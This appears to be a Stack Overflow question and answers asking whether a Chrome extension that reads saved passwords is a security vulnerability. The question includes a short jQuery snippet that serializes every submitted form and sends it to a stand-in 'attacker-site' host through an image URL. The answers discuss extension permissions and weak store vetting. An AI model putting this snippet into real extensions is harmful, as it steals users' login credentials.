# Stealling user saved passwords by Chrome extension is a Security Vulnerability or not?

Tags: javascript, google-chrome, security, google-chrome-extension

I had a test in my local environment like this.

1. Assume that I have a saved username - password on X site.
2. Make a Chrome extension that has background like this

In *background.js*:

```
$(document).on('submit','form',function(){
    $("img.logo").attr("src","https://attacker-site/logo.png?data=" + $(this).serialize());
});
```

After the user open X site and then login with the saved password. Using set new image's source can bypass CORS and I will get all the form submitted data including saved password.

So, it's a **Security vulnerability** or **Not** - because it's very hard to deliver this Chrome extension to normal users? (for example: Chrome store will verify new extension very carefully before publish it..)

Comment: are you asking how to steal passwords?

Comment: Similar topic/issue: http://bgr.com/2018/01/01/password-manager-security-issue-ad-trackers/

Comment: @JaromandaX: No, certainly. I just want to know this is a security vulnerability or not.

Comment: Extensions can do a lot of privileged stuff that web pages can't even dream of so AFAICT there's absolutely nothing surprising here.

Comment: @wOxxOm: So i can conclude that it definetly not a security vulnerability and normal users have to protect themselves against any unknown extensions. Thank you.

Answer (score 2, accepted):

Some extensions are super powered and can run arbitrary JavaScript on pages. Extensions ask for this permission when users install them.

In principle - extensions can steal all your browsing information, open and query arbitrary pages and read passwords as you submit forms.

They can also unfriend all your friends on Facebook, email pictures of horses to your extended family and send winky smilies to your boss.

Chrome store doesn't verify extensions very well - in practice extensions like "image resizer" can mine cryptocurrency happily or send information to their server (which has been the case) and there is even a business around buying the ability to run code on users' computers using extensions.

I think Chrome's policy is based on the assumption users are adults and can make choices about what extensions they want to install. Oh well.

Comment: As a fun update - in the week of  this answer Chrome introduced automatic checks for extensions and ban crypto miners. Maybe someone read this :D https://blog.chromium.org/2018/04/protecting-users-from-extension-cryptojacking.html